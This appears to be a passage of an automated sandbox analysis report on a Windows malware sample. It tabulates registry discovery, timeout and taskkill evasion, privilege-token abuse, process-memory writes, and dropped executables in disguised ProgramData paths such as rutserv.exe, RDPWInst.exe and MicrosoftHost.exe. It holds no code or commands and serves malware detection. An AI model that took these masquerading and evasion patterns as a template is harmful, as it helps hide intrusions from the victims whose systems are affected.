Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows\rfusclient.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\programdata\microsoft\intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 281477286448623 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 133908091709292702 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215507984765782 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 1374389534720 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313612292914425336 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 53172266348 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 6937813002834471071 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215380712805364 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 11682311077888 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215432252412916 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215432252412916 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 342104659285993056 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215522446726132 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313565634309718272 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 281477286448623 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313565632316571904 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 6937813002834471071 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215273388954615 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 79674864 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 8796172680096 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 342200935193249148 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 17179869189 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 2533489538760714 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 868727105659787095 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 77389068136 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 1058 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 34393294800 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 8589934592 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 120259084316 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
